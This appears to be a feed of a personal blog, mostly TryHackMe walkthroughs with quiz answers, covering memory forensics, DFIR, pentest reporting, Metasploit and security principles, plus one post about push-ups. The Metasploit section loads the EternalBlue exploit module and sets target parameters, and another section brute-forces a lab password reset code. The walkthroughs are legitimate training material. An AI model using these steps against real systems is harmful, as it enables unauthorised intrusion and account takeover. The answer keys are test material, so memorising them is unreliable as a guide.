In-Memory Scripts (T1086)

Malicious PowerShell/Python scripts executed in RAM, leaving encoded commands or runtime traces.

Persistence Mechanisms

Scheduled Tasks (T1053.005): Malicious schtasks.exe arguments.
Services (T1543.003): Unusual service binaries in services.exe.
Registry Run Keys (T1547.001): Malware paths in memory-cached registry hives.

Lateral Movement

PsExec (T1021.002): Service creation/command-line args.
WinRM/PowerShell (T1021.006, T1059.001): Remoting artifacts, base64-encoded commands.
WMI (T1047): Suspicious wmic process-creation strings.

Memory forensics tools (e.g., Volatility) uncover these stealthy tactics by analyzing runtime artifacts and kernel structures.

Q1: What technique involves replacing a trusted process’s memory with malicious code?

Process hollowing

Q2: Which Windows service provides PowerShell remoting?

WinRM

Q3: What MITRE technique ID is associated with in-memory PowerShell execution?

T1086

Q4: What command-line tool enables remote execution and is linked to lateral movement (T1021.002)?

PsExec

Q5: Which MITRE technique involves setting tasks that persist through reboots (e.g., schtasks.exe)?

T1053.005

Task 5: Practical

Visit the site below, place the term in the proper definition, and get the flag.

Interactive Exercise

You can follow the answer below to complete it and get the flag.

Main working memory in an OS

RAM

Contains processes launched by the user or applications

User-Space

PsExec enables command execution on remote systems

T1021.002 — Remote Services

Stores temporary data like function arguments and return addresses

Stack

Captures all RAM, including user and kernel space

Full Memory Dump

Malicious code is injected into legitimate processes

Code Injection “Before I finish, I apologize for blurring the flag. I wanted you to experience taking action, not just answering the question. Thank you.”

Q1: What is the value of the flag?

THM(*******************)

Task 6: Conclusion

In this room, we learned the significance of memory analysis in digital forensics, focusing on volatile memory, RAM’s role in storing active data, and its priority during incident response. We explored memory structure, forensic artifacts, and the creation of memory dumps. Additionally, we examined common attack techniques like credential dumping, DLL injection, script execution, and persistence or lateral movement, highlighting RAM’s crucial role in threat detection.

No Answer Needed

DFIR: An Introduction | TryHackMe Write-Up

Tue, 27 May 2025 06:39:58 GMT

Here is my article on the walkthrough of a free room: DFIR: An Introduction. Introductory room for the DFIR module. I wrote this in 2025 and hope it is useful for learning about DFIR.

Task 1: Introduction

This text introduces the importance of Digital Forensics and Incident Response (DFIR) in defensive security, emphasizing the need to prepare for security incidents despite efforts to prevent them. It outlines key topics to be covered, including the

Introduction to DFIR,
Basic concepts
Industry incident response processes
Tools used in DFIR

The goal is to provide foundational knowledge in this area and explore further resources.

No Answer Needed

Task 2: The need for DFIR

DFIR (Digital Forensics and Incident Response) is a field focused on collecting forensic evidence from digital devices like computers, smartphones, and media devices to investigate security incidents. It helps security professionals identify traces left by attackers, assess the scope of a breach, and restore systems to their pre-incident state.

DFIR is essential for:

Detecting attacker activity and distinguishing real threats from false alarms.
Removing attackers and eliminating their access to the network.
Determining the scale and duration of breaches, aiding communication with stakeholders.
Identifying vulnerabilities that caused the breach and improving defenses.
Understanding attacker tactics to prevent future intrusions.
Sharing attack information with the community.

DFIR professionals combine skills in Digital Forensics (identifying digital evidence) and Incident Response (using that evidence to address security incidents). These two areas are closely linked, with Incident Response relying on Digital Forensics insights, and Forensics guided by the scope of the Incident Response process.

Q1: What does DFIR stand for?

Digital Forensics and Incident Response

Q2: DFIR requiz|zres expertise in two fields. One of the fields is Digital Forensics. What is the other field?

Incident Response

Task 3: Basic concepts of DFIR

Key practices and terminology:

Artifacts: Pieces of evidence pointing to activities on a system, such as Windows registry keys used by attackers for persistence. Artifacts are collected from various sources like file systems, memory, or network activity during DFIR.
Evidence Preservation: To maintain the integrity of collected evidence, it must be write-protected, and analysis should be performed on copies, not the original data. This ensures no contamination of the original evidence.
Chain of Custody: The process of maintaining secure control over evidence to ensure its integrity. Any mishandling or unauthorized access can contaminate the evidence, weakening the investigation’s credibility.
Order of Volatility: Digital evidence is often volatile and can be lost if not captured in time. More volatile sources, such as RAM, should be preserved before less volatile ones, like hard drives, to prevent data loss.
Timeline Creation: After collecting and preserving evidence, creating a timeline of events is essential for understanding the sequence of actions during an incident. This timeline helps provide clarity and context to the investigation.

These concepts are foundational for DFIR professionals to efficiently and effectively handle digital evidence during an investigation.

Q1: From amongst the RAM and the hard disk, which storage is more volatile?

RAM

Let’s view the attached static site to practice timeline creation and answer the first question. To do that, click on the View Site button in the top-right corner of this task.

You can click the log, as it can be in the spreadsheet, like the image below.

Click the row to add it to the spreadsheet, then drag and drop it in ascending order of time.

Next, click the row that shows a successful login, like the image below.

Click the red row in the image below again.

Then, reorder everything again in ascending time, and you will get the flag. Congratulations!

“Before I finish, I apologize for blurring the flag. I wanted you to experience taking action, not just answering the question. Thank you.”

Q2: Complete the timeline creation exercise in the attached static site. What is the flag that you get after completion?

THM(*************)

Task 4: DFIR Tools

Several tools used in the DFIR process to enhance the capabilities and efficiency of security professionals:

Eric Zimmerman’s Tools: Tools for forensic analysis on Windows platforms, covering areas like the registry, file system, and timelines. For more details, check out the Windows Forensics rooms.
KAPE: A tool for automating the collection and parsing of forensic artifacts, helping create event timelines. Learn more in the KAPE room.
Autopsy: An open-source platform for analyzing data from digital media like hard drives and mobile devices, with plugins to speed up the forensic process. The Autopsy room provides more details.
Volatility: A powerful memory analysis tool for both Windows and Linux, used to extract information from machine memory. More information is available in the Volatility room.
Redline: An incident response tool by FireEye for gathering forensic data from a system. The Redline room provides additional insights.
Velociraptor: An advanced, open-source endpoint-monitoring and forensic response platform. Learn more about it in the Velociraptor room.

These tools assist in the DFIR process, and the next task will focus on understanding the Incident Response process and how Digital Forensics is integrated.

No Answer Needed

Task 5: The Incident Response process

Compares the IR methods defined by NIST and SANS, which are largely similar but with slight variations in step categorization. SANS uses the acronym PICERL for the following steps:

Preparation: Preparing in advance for potential incidents by ensuring the right people, processes, and technologies are in place.
Identification: Detecting an incident by analyzing indicators, eliminating false positives, and notifying stakeholders.
Containment: Limiting the impact of the incident through short-term and long-term measures based on forensic analysis.
Eradication: Removing the threat from the network after ensuring it is fully contained and preventing re-entry by the attacker.
Recovery: Restoring affected services to their original state post-incident.
Lessons Learned: Reviewing the incident, documenting findings, and improving future preparedness to handle similar incidents.

The NIST process aligns closely, though it combines Containment, Eradication, and Recovery into a single step, whereas SANS separates them. Post-incident activities in NIST and Lessons Learned in SANS are comparable. The steps are crucial for integrating Digital Forensics into effective incident handling.

Q1: At what stage of the IR process are disrupted services brought back online as they were before the incident?

Recovery

Q2: At what stage of the IR process is the threat evicted from the network after performing the forensic analysis?

Eradication

Q3: What is the NIST-equivalent of the step called “Lessons learned” in the SANS process?

Post-incident Activity

Task 6: Conclusion

In this room, we covered the following key points:

What DFIR is and its applications.
The importance of performing DFIR.
Basic concepts such as chain of custody, evidence preservation, and order of volatility.
Tools used in the industry, including EZ tools, KAPE, and Autopsy.
The PICERL process for incident response.

No Answer Needed

Writing Pentest Reports | TryHackMe Write-Up

Tue, 20 May 2025 04:39:53 GMT

Here is my article on the walkthrough of a free room: Writing Pentest Reports. Learn how to write professional pentesting reports that communicate risk to business stakeholders. I wrote this in 2025 and hope it is useful for learning about writing pentest reports.

Task 1: Introduction

This course focuses on writing professional, client-ready penetration testing reports. It teaches you the importance of reporting, how to communicate with different audiences (executives, developers, security engineers), and how to structure a useful report. You’ll learn to present technical findings with business context, write actionable remediation guidance, and maintain a professional tone. By the end, you’ll understand the purpose of pentest reports, how to tailor your language, and how to ensure accuracy and consistency in your reports.

No Answer Needed

Task 2: The Anatomy of a Pentest Report

This task discusses the importance of tailoring penetration testing reports to different audiences: technical, security, and business stakeholders.

Audience Breakdown:

Technical Stakeholders: The primary audience, usually developers or IT support teams, who need detailed technical guidance on vulnerabilities and remediation steps.
Security Stakeholders: Security teams who prioritize and assess risk but don’t directly remediate vulnerabilities; the report helps them prioritize which issues need immediate attention.
Business Stakeholders: Non-technical individuals, often funding the test, who need to understand the business impact of vulnerabilities and why remediation matters.

Report Sections:

Summary: A high-level overview for business and security stakeholders, focusing on what was tested, what was found, and its business impact.
Vulnerability Write-Ups: Detailed technical explanations for the technical team, including how to replicate and fix vulnerabilities.
Appendices: Supporting details for security stakeholders, such as testing scope, methodology, and artefacts.

The structure of the report ensures that it speaks to all audiences, making it easier for them to take action based on the findings. A well-organized report ensures the findings are not ignored, leading to better prioritization and remediation.

Q1: Which stakeholder should 80% of your report be aimed towards?

Technical

Q2: Which section of the report is for extra information that can sometimes help security stakeholders better understand what coverage was achieved and the next steps that should be followed?

Appendices

Task 3: Report Section 1: Summary

A penetration testing (pentest) report’s summary is crucial for conveying the assessment’s findings to both technical and non-technical stakeholders. It should address key questions such as:

What was tested? Provide an overview of the systems or applications assessed.
What were the findings? Summarize the vulnerabilities or issues discovered.
What is the impact? Explain the potential consequences of these findings on the business or system.
What are the next steps? Offer high-level remediation recommendations.

This summary should be written in clear, non-technical language to ensure accessibility for all readers. It’s often beneficial to separate the summary into two sections:

Executive Summary: Tailored for business stakeholders, focusing on the strategic impact and necessary actions.
Findings & Recommendations: Directed at security teams, providing detailed insights into vulnerabilities and suggested remediation steps.

By effectively structuring the summary, the report can facilitate informed decision-making and prompt appropriate actions to address identified security issues.

Let us read this instruction below.

This is the best answer to achieve a perfect score of 400/400.

Overview: A black-box penetration test was performed against the TryBankMe platform, TryHackMe’s new online banking system. The test focused on core banking features such as registration, login, and transaction processing, with the aim of identifying security risks before public launch.
[Score: 100]

Results: The application showed good security in most areas tested, including login and access control. However, a race condition was discovered in the transaction feature that could allow users to manipulate balances.
[Score: 100]

Impact: Exploiting the race condition may let attackers trigger multiple overlapping transactions, allowing them to bypass balance checks and generate unauthorised credits.
[Score: 100]

Remediation Direction: Add transaction locking and atomic operations to prevent balance manipulation. Include monitoring for unusual patterns and validate the fix through a focused retest.
[Score: 100]

And then we get the flag to claim the answer. Let’s try.

Q1: What is the value of the flag?

THM{..****.*********}

Task 4: Report Section 2: Vulnerability Write-Ups

A vulnerability write-up should explain the vulnerability, where it was found, how it was discovered, and how to remediate it. This section is written primarily for stakeholders who will fix the issues, such as developers and administrators, but can also be reviewed by security analysts or project managers.

A well-structured write-up includes:

Title: A concise heading
Risk Rating: The severity of the vulnerability
Summary: A brief explanation of the issue
Background: Context and why it matters
Technical Details: Evidence of the vulnerability
Impact: What could happen if exploited
Remediation Advice: Clear steps to resolve the issue
References (optional): Links to supporting resources

The report should be tailored to the specific system or environment where the vulnerability was found, ensuring that it is clear and actionable for the client.

We can read the instructions first in the image below.

This is the best answer to achieve a perfect score of 700/700.

Title: Race Condition in Transaction Handling Allows Balance Manipulation
[Score: 100]

Risk Rating: High (CVSS 3.1 Base Score: 8.6) – Exploitation allows unauthorised balance inflation with no authentication bypass required.
[Score: 100]

Summary: A race condition was discovered in the transaction endpoint that enables users to initiate multiple overlapping transfers, resulting in unauthorised increases in account balance.
[Score: 100]

Background: Race conditions occur when a system performs multiple operations simultaneously without proper handling, leading to unexpected outcomes. In web applications, this often affects financial systems where order and timing of requests are critical. Without transaction locking or atomic checks, users can exploit timing to create inconsistent states.
[Score: 100]

Technical Details & Evidence: The issue was confirmed by sending multiple concurrent POST requests to the /transfer endpoint using the same account balance. Using a script, we initiated five identical transfer requests simultaneously. All requests were processed, resulting in a final balance that did not reflect the deduction, effectively duplicating funds.
[Score: 100]

Impact: If left unaddressed, this vulnerability could allow malicious users to create funds out of nothing by exploiting timing gaps in transaction validation. This could lead to direct financial loss, reputational damage, and potential legal implications for failing to safeguard transaction integrity.
[Score: 100]

Remediation Advice: Implement transaction-level locking or atomic operations in the backend to prevent parallel processing of balance-altering actions. Additional safeguards like rate limiting and anomaly detection on rapid or duplicate transactions should also be considered. Validate fixes with targeted retesting.
[Score: 100]

And then you can get the flag for answering the question.

Q1: What is the flag?

THM{...****.***}

Task 5: Report Section 3: Appendices

Assessment Scope

This appendix outlines the alignment between the actual assessment and the initial scope defined in the Rules of Engagement (RoE). It highlights any deviations, such as areas not tested or changes in testing parameters, providing stakeholders with clarity on the coverage and any potential need for further assessment.

Assessment Artefacts

This section catalogs any changes or additions made during testing, such as uploaded files or configurations. It serves as an audit trail, ensuring that any remnants from testing are identified and appropriately managed to prevent future security incidents.

Q1: Which appendix will be vital for the blue team to discern if activity is from a pentest or an actual attack?

Assessment Artefacts

Task 6: Styling Guides and Report QA

Writing a pentest report is about clearly and professionally communicating findings. A well-written report is essential for long-term reference, even after the project team changes. Key points for a strong report include:

Clarity: Use simple, direct language to avoid ambiguity, ensuring your findings are understood by all readers.
Professional Writing: Maintain objectivity and avoid informal language, slang, or emotional tone. Be consistent in terminology and formatting.
Best Practices: Write in past tense, avoid first-person language, mask sensitive data, and use formal phrasing.
Quality Assurance (QA): Review your report for clarity and consistency. Peer review is essential to ensure the report is actionable and professional.

Ultimately, good writing enhances the impact of your findings and ensures they are taken seriously.

To answer the question, we need to read the instructions first in the image below.

First mistake: Credentials should never be shown in clear text, even for test accounts.

Second mistake: ‘Pwned’ is slang and inappropriate in professional reporting.

Third Mistake: ‘Messed around’ is informal and should be replaced with a more professional phrase like ‘conducted timing tests’.

Fourth mistake: The word ‘extensivly’ is a misspelling. It should be ‘extensively’.

And then you can get the flag for answering the question.

Q1: What is the value of the flag?

THM{QA.Makes.Reports.Better}

Task 7: Conclusion

Publishing a professional pentest report is crucial, as it serves as the lasting evidence of your work. The report should be structured to cater to different audiences, with a clear summary of business risks, detailed vulnerability descriptions, and tailored remediation advice. It’s important to maintain clarity, objectivity, and professionalism throughout the writing process. Quality assurance ensures the report is ready to be delivered. A well-written report transforms technical findings into actionable insights, making a significant impact on improving an organization’s security.

No Answer Needed

Jr Security Analyst Intro | TryHackMe Write-Up

Fri, 16 May 2025 19:47:49 GMT

Here is my article on the walkthrough of a free room: Junior Security Analyst Intro. Play through a day in the life of a Junior Security Analyst, their responsibilities and qualifications needed to land a role as an analyst. I wrote this in 2025 and hope it is useful for learning about security analyst.

Task 1: A career as a Junior (Associate) Security Analyst

A Junior Security Analyst, often referred to as a Tier 1 SOC Analyst or Triage Specialist, is a starting position in the field of cybersecurity.

Key Responsibilities:

Monitor and investigate alerts in a 24/7 SOC environment.
Configure and manage security tools.
Develop and implement basic Intrusion Detection System (IDS) signatures.
Participate in SOC working groups and meetings.
Create tickets and escalate security incidents to Tier 2 analysts or team leads when necessary.(LinkedIn)

Required Qualifications:

0–2 years of experience in security operations.
Basic understanding of networking (OSI or TCP/IP models), operating systems (Windows, Linux), and web applications.
Scripting/programming skills are a plus.

Desired Certification:

CompTIA Security+

The next level for a Junior Security Analyst is to become an Incident Responder (Tier 2) and then a Threat Hunter (Tier 3) as they gain experience and expertise.

Q1: What will be your role as a Junior Security Analyst?

Triage Specialist

Task 2: Security Operations Center (SOC)

A Security Operations Center (SOC) has to monitor, detect, investigate, and respond to cybersecurity threats 24/7.

Key Duties:

Monitor and investigate alerts in a 24/7 SOC environment.
Set up and manage security tools.
Create and implement basic Intrusion Detection System (IDS) signatures.
Attend SOC meetings and participate in working groups.
When necessary, open tickets and report security incidents to team leads or Tier 2 analysts.

No Answer Needed

Task 3: A day In the life of a Junior (Associate) Security Analyst

As a Junior Security Analyst, your role will include:

Monitoring Network Traffic: Monitor alerts from IPS and IDS, and review suspicious emails to identify potential threats.
Extracting Forensic Data: Analyze forensic data to detect and investigate possible attacks.
Using Open-Source Intelligence: By utilizing open-source intelligence, you’ll make informed decisions to address security alerts effectively.
Incident Response: You’ll investigate and manage security incidents, working through them which may take anywhere from hours to weeks, depending on the severity.
Threat Remediation: After an attack, you’ll help detect, contain, and resolve threats, including addressing concerns like data exfiltration and host pivoting.

This role is challenging but rewarding, providing hands-on experience in network defense and cybersecurity.

Click on the green View Site button in this task to open the Static Site Lab and navigate to the security monitoring tool on the right panel to try to identify the suspicious activity.

From the information in the alert log, we know that there is an unauthorized connection attempt detected from a specific IP address.

Q1: What was the malicious IP address in the alerts?

221.181.185.159

We can try scanning to check that IP address.

There are open-source databases, such as AbuseIPDB and Cisco Talos Intelligence, that help security analysts check the reputation and location of IP addresses.

Now, we need to figure out who will escalate this event.

Q2: To whom did you escalate the event associated with the malicious IP address?

Will Griffin

After that, we can add the malicious IP address to the block list and capture the flag.

Q3: After blocking the malicious IP address on the firewall, what message did the malicious actor leave for you?

THM{*******************}

Pentesting Fundamentals | TryHackMe Write-Up

Thu, 08 May 2025 09:11:56 GMT

Here is my article on the walkthrough of a free room: Pentesting Fundamentals. Learn the important ethics and methodologies behind every pentest. I wrote this in 2025 and hope it is useful for learning about pentesting.

Task 1: What is Penetration Testing?

Understanding the role of a penetration tester and the processes involved is essential before delving into the technical aspects of ethical hacking. Cybersecurity’s significance continues to grow, impacting various facets of life.

Penetration testing, or pentesting, involves ethically simulating cyberattacks to identify vulnerabilities in systems and applications. This proactive approach helps organizations strengthen their defenses against potential threats.

With the increasing frequency of cyberattacks, estimated at 600 million daily globally, the need for skilled professionals in ethical hacking is more critical than ever.

No answer needed

Task 2: Penetration Testing Ethics

Penetration testing in cybersecurity raises legal and ethical issues. While penetration tests are legal when authorized by the system owner, they may involve ethically questionable actions. Hackers are classified into:

White Hat (ethical)
Grey Hat (break laws for good causes)
Black Hat (criminal)

A penetration test follows the “Rules of Engagement” (ROE), a document outlining permission, test scope, and allowed techniques, ensuring legality and ethical clarity throughout the process.

Q1: You are given permission to perform a security audit on an organisation; what type of hacker would you be?

White Hat

Q2: You attack an organisation and steal their data, what type of hacker would you be?

Black Hat

Q3: What document defines how a penetration testing engagement should be carried out?

Rules of Engagement

Task 3: Penetration Testing Methodologies

Penetration testing follows a methodology with stages that include:

Information Gathering: Collect public information.
Enumeration/Scanning: Discover system services.
Exploitation: Leverage vulnerabilities.
Privilege Escalation: Gain higher access.
Post-exploitation: Includes targeting other hosts, gathering data, covering tracks, and reporting.

Common methodologies:

OSSTMM: Detailed, covers systems, software, and communications.
OWASP: Focuses on web applications, actively maintained.
NIST Cybersecurity Framework: Popular for critical infrastructure, lacks cloud computing focus.
NCSC CAF: Evaluates risks and defenses for critical sectors, principle-based.

Q1: What stage of penetration testing involves using publicly available information?

Information Gathering

Q2: If you wanted to use a framework for pentesting telecommunications, what framework would you use? Note: We’re looking for the acronym here and not the full name.

OSSTMM

Q3: What framework focuses on the testing of web applications?

OWASP

Task 4: Black box, White box, Grey box Penetration Testing

The three primary scopes in penetration testing are:

1. Black-Box Testing

No knowledge of the application’s inner workings.
Tester acts as a regular user, testing functionality.
Time-consuming due to extensive information gathering.

2. Grey-Box Testing

Combines Black-Box and White-Box testing.
Tester has limited knowledge of internal components.
Saves time and is used for well-hardened attack surfaces.

3. White-Box Testing

Tester has full knowledge of the application and its internal components.
Involves detailed testing of internal functions.
Time-consuming but ensures through validation of the attack surface.

Q1: You are asked to test an application but are not given access to its source code — what testing process is this?

Black Box

Q2: You are asked to test a website, and you are given access to the source code — what testing process is this?

White Box

Task 5: Practical: ACME Penetration Test

ACME has tasked you with performing a penetration test on their infrastructure. You are required to visit the site and follow the guided instructions to complete the assignment.

1. Rules of Engagement: Define objectives like permission, test scope, and rules, outlining what actions the tester can perform, such as access limits to parts of the application.

2. Information Gathering: Collect publicly available information about the target, such as employee profiles or contact details, to aid in targeting and further testing.

3. Enumeration & Scanning: Identify user accounts, machines, and applications within the target network using the gathered information to create a detailed profile of the system.

Try to scan the IP that has been obtained from stage 2 in order to carry out the enumeration process

4. Exploitation: Use identified vulnerabilities to gain unauthorized access to the system or application, ethically exploiting weaknesses for penetration.

5. Post Exploitation: Maintain access and escalate privileges to higher user levels, extracting sensitive data and attempting to access other networked systems.

6. Pentest Report & Clearing-up: Create a report detailing security issues and recommendations, and clean up the environment by removing testing artifacts.

Complete the penetration test engagement against ACME’s infrastructure.

THM(****************)

Learning Cyber Security | TryHackMe Write-Up

Thu, 01 May 2025 16:38:34 GMT

Here’s my walkthrough article of a free room for Learning Cyber Security. It provides a brief introduction to several key security topics you’ll explore. Written in 2025, I hope it serves as a helpful on your cybersecurity learning journey.

Task 1: Web Application Security

Understanding how the web works is crucial for attacking web applications. Hacking isn’t magical — it’s about knowing how a website functions and identifying weaknesses to exploit. With a solid grasp of the fundamentals, you’ll learn the techniques and tools used in hacking. Vulnerabilities in applications or systems present opportunities for attacks, as they expose weaknesses that can be taken advantage of.

Click the green “View Site” button above and learn how to hack BookFace, TryHackMe’s vulnerable social media site.

No answer needed

Q1: What is the username of the BookFace account you will be taking over?

To answer this question, you need to start the site provided on the platform.

This is the username that can be used in the next page for reset the password.

Ben.spring

There are 10,000 possible code combinations. Trying each one individually would take very long, so try inputting a random reset code instead.

Use the BruteForce tool with a code min (1) and max (10,000) value.

Reset Ben’s password to continue, and then the flag will appear.

Q2: Hack the BookFace account to reveal this task’s answer!

THM(************)

Task 2: Network Security

Networking is crucial in cybersecurity. Understanding how networks operate helps in scanning, identifying devices, and analyzing logs to monitor user activities.

Click the green “View Site” button above and see how Target was hacked on the right hand side.

No answer needed

Q1: How much did the data breach cost Target?

$300 million

Task 3: Learning Roadmap

The Pre-Security learning path is designed to provide the foundational technical knowledge necessary to embark on a cybersecurity career. Upon completion, you can choose to specialize in either Offensive Pentesting, focusing on ethical hacking and system exploitation, or Cyber Defense, concentrating on threat analysis and system protection. The skills acquired from these learning paths will prepare you for roles such as ethical hacker, penetration tester, or cybersecurity analyst.

No answer needed

Metasploit: Introduction | TryHackMe Write-Up

Wed, 30 Apr 2025 15:30:00 GMT

Here is my article on the walkthrough of free room for Metasploit: Introduction an overview of the main components of the Metasploit Framework. I wrote this in 2025 and hope it is useful for learning about Metasploit.

Task 1: Introduction to Metasploit

Metasploit is a popular exploitation framework used in penetration testing, offering tools for tasks ranging from information gathering to post-exploitation. It has two versions:

Metasploit Pro (a commercial version with a graphical interface)
Metasploit Framework (an open-source, command-line version).

The framework includes components like msfconsole, supporting modules (exploits, scanners, payloads), and standalone tools like msfvenom. This room will help you learn how to use Metasploit to find exploits, set parameters, and exploit vulnerable services.

No answer needed

Task 2: Main Components of Metasploit

Metasploit Framework is primarily interacted with through the msfconsole, which serves as the main interface to various modules. These modules perform tasks like exploiting vulnerabilities, scanning, and brute-force attacks. Key concepts include:

Exploit: Code that leverages a vulnerability to compromise a system.
Vulnerability: A flaw in a system that can be exploited.
Payload: Code that runs on the target system after an exploit is successful.

Metasploit modules are categorized into:

Auxiliary: Tools for scanning, crawling, and fuzzing.
Encoders: Encode exploits and payloads to bypass antivirus software.
Evasion: Modules designed to avoid detection by security systems.
Exploits: Modules categorized by the target system, like Windows, Linux, or Android.
NOPs: No operation codes used as a buffer in exploits.
Payloads: Codes that execute specific actions like opening a shell on the target system.
Post-exploitation: Modules used after gaining access to a system.

These components help security professionals perform penetration tests and assess vulnerabilities. Each module serves a specific purpose, and their organization within the Metasploit framework enables effective exploitation and post-exploitation actions.

Q1: What is the name of the code taking advantage of a flaw on the target system?

Exploit

Q2: What is the name of the code that runs on the target system to achieve the attacker’s goal?

payload

Q3: What are self-contained payloads called?

singles

Q4: Is “windows/x64/pingbackreversetcp” among singles or staged payload?

singles

Task 3: Msfconsole

The Metasploit Framework uses msfconsole as its main interface, which allows users to interact with its features, such as running exploits, configuring payloads, and executing other commands. It supports many common Linux commands and offers tools for penetration testing. Key features include tab completion, command history, and module context, which require parameters like RHOSTS and RPORT for exploits. Commands like show options and search help configure and find modules, while the help command provides details on available options. This console is an essential tool for conducting cybersecurity assessments.

I try to ran the msfconsole in Kali Linux.

Q1: How would you search for a module related to Apache?

search apache

Q2: Who provided the auxiliary/scanner/ssh/sshlogin module?

You can run this script to find out who provided the information for auxiliary/scanner/ssh/sshlogin

info auxiliary/scanner/ssh/ssh_login

todb

Task 4: Working with modules

This guide explains how to use Metasploit Framework for penetration testing, including launching modules, setting parameters, and managing sessions. It covers the set command to configure essential parameters like RHOSTS, RPORT, LHOST, and LPORT, and emphasizes checking configurations with the show options command. The text also discusses using global parameters with setg, backgrounding sessions, and interacting with them using the sessions command. Finally, it highlights various Metasploit prompts, such as the msfconsole, context-specific prompts, and Meterpreter shell.

You can first run this script to use the module: use exploit/windows/smb/ms17_010_eternalblue

Q1: How would you set the LPORT value to 6666?

set LPORT 6666

Q2: How would you set the global value for RHOSTS to 10.10.19.23 ?

setg RHOSTS 10.10.19.23

Q3: What command would you use to clear a set payload?

unset PAYLOAD

Q4: What command do you use to proceed with the exploitation phase?

exploit

Task 5: Summary

Metasploit is a powerful framework that aids in the exploitation process, which involves identifying, customizing, and deploying exploits against vulnerable services. Throughout this training, we’ve explored the fundamental components of Metasploit and their applications. A practical example is the use of the ms17_010_eternalblue exploit to gain access to a target virtual machine. In subsequent sessions, we'll delve deeper into Metasploit's features, enhancing your understanding of its capabilities.

No Answer Needed

Simply Transform Negative Thoughts into Hundreds of Push-ups

Wed, 30 Apr 2025 03:01:34 GMT

Here, I want to share my daily solution for managing stress and other negative thoughts, such as sadness, boredom, and more. Furthermore, it can help build your muscles and self-discipline for free.

Note: Before you read further, I want to explain that I am not an expert in psychology, health, or related fields. This is just my personal solution, so it may be very relative to each person. Even though I believe this works, I could be wrong.

Actually, this method is somewhat inspired by various online communities focused on controlling lust and self-discipline. I’ve come across discussions where individuals suggest that when certain urges arise, one can counter them by engaging in a brief physical activity, such as doing 25 push-ups. Initially, I found this approach a bit awkward, especially considering how it might feel to do push-ups in a public setting. However, I now understand the underlying principle. Let me explain this further.

Transforming Thoughts into Action

Rather than falling deeper into overthinking my negative thoughts, it’s better for me to search for a solution, even if it may be just temporary. I feel better when I try to do 10 push-ups at a time. If I don’t feel enough, I do 10 more push-ups, and so on. I might stop when I feel tired, but I often feel better than before.

The Science Behind It

Some of the studies I have read suggest that exercise is beneficial because it often releases endorphins, the ‘feel-good’ hormones that improve mood and reduce feelings of stress.

How I Implement It and the Data

I have implemented this method into my daily routine, and I also track it in my mobile app, Loop Habit Tracker. You can download it for free from the Play Store or App Store. Sorry, I’m not endorsing it. Here is the chart that I try to record every day.

Push Ups / Dips in Loop Habbit Tracker

Sometimes i really don’t realize it. For example, if I am feel sad then I will do 10 push ups. But, in the end of the day i was actually surprised because of what! i do 350 push ups which is maybe ini this day i feel sad 35x (because of 10x35=350). Maybe this is the part of complexity, yes sadness is still complex i think.

Thank you so much for reading!
Your time and attention mean the world to me. If you enjoyed this article, let’s stay connected and continue the conversation. You can find me on:

Feel free to reach out — I’d love to hear your thoughts and ideas. Until next time, stay curious and keep exploring!

Principles of Security | TryHackMe Write-Up

Tue, 29 Apr 2025 05:20:19 GMT

Here is my article on the walkthrough room for TryHackMe: Principles of Security, I wrote this in 2025 and hope it is useful for learning about principle of security.

Task 1: Introduction

This room is about outline some of the fundamental principles of information security.

Let’s proceed!

No answer needed

Task 2: The CIA Triad

The CIA triad is a fundamental information security model comprising Confidentiality, Integrity, and Availability. It guides the creation of security policies to ensure that sensitive data is protected, remains accurate, and is accessible to authorized users.

Confidentiality ensures that sensitive data is protected from unauthorized access or misuse by implementing access controls and classification systems.
Integrity maintains data accuracy and consistency, preventing unauthorized or accidental modifications through methods like access restrictions, digital signatures, and hash verifications.
Availability ensures data and systems are accessible to authorized users when needed by using reliable hardware, backups, and robust security protocols to minimize downtime.

Each component is interdependent; failing to meet one can undermine the entire security framework. The CIA triad provides a continuous cycle for evaluating and prioritizing data protection needs in various contexts, from cybersecurity to physical record storage.

Q1: What element of the CIA triad ensures that data cannot be altered by unauthorised people?

integrity

Q2: What element of the CIA triad ensures that data is available?

availability

Q3: What element of the CIA triad ensures that data is only accessed by authorised people?

confidentiality

Task 3: Principles of Privileges

Properly defining and managing access levels in IT systems is crucial. Access is based on a user’s organizational role and the sensitivity of the data involved. Two main concepts manage this process: Privileged Identity Management (PIM), which aligns user roles with system access, and Privileged Access Management (PAM), which oversees the permissions those roles carry.

The principle of least privilege is essential — users should only have the minimal access needed for their tasks. PAM also includes enforcing password policies, auditing, and lowering risk by minimizing unnecessary privileges.

Q1: What does the acronym “PIM” stand for?

Privileged Identity Management

Q2: What does the acronym “PAM” stand for?

Privileged Access Management

Q3: If you wanted to manage the privileges a system access role had, what methodology would you use?

PAM

Q4: If you wanted to create a system role that is based on a users role/responsibilities with an organisation, what methodology is this?

PIM

Task 4: Security Models Continued

Security models help organizations formally achieve the CIA triad — Confidentiality, Integrity, and Availability — by providing structured methods to control access to information systems.

Bell-La Padula Model focuses on confidentiality using hierarchy-based policies. It applies rules like “no write down, no read up,” suitable for hierarchical organizations (e.g., military or government) where trusted, vetted users operate. While easy to implement and mirroring real-life org charts, it assumes users are trustworthy and doesn’t fully conceal the existence of information.
Biba Model targets integrity with the principle of “no write up, no read down.” This means users can only write at or below their level and read above it, ensuring data accuracy over secrecy. While simple and effective for integrity, it may create operational inefficiencies and complicate access control in environments with many roles.

Summary: Bell-La Padula protects sensitive information in hierarchical setups, while Biba safeguards data accuracy where integrity is crucial, such as in software development. Each model has strengths and limitations, often tailored to the specific security priorities of an organization.

Q1: What is the name of the model that uses the rule “can’t read up, can read down”?

The Bell-LaPadula Model

Q2: What is the name of the model that uses the rule “can read up, can’t read down”?

The Biba Model

Q3: If you were a military, what security model would you use?

The Bell-LaPadula Model

Q4: If you were a software developer, what security model would the company perhaps use?

The Biba Model

Task 5: Threat Modelling & Incident Response

Threat modeling is a continuous process for assessing and improving an organization’s IT security by identifying potential threats, vulnerabilities, and assessing risks. It involves preparation, identifying threats, implementing mitigations, and regular review. Frameworks like STRIDE help categorize threats (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege), guiding security improvements.

When security breaches (incidents) occur, a Computer Security Incident Response Team (CSIRT) manages the response through six phases: preparation, identification, containment, eradication, recovery, and lessons learned, aiming to restore operations and prevent future incidents.

Q1: What model outlines “Spoofing”?

STRIDE

Q2: What does the acronym “IR” stand for?

Incident Response

Q3: You are tasked with adding some measures to an application to improve the integrity of data, what STRIDE principle is this?

Tampering

Q4: An attacker has penetrated your organisation’s security and stolen data. It is your task to return the organisation to business as usual. What incident response stage is this?

Recovery

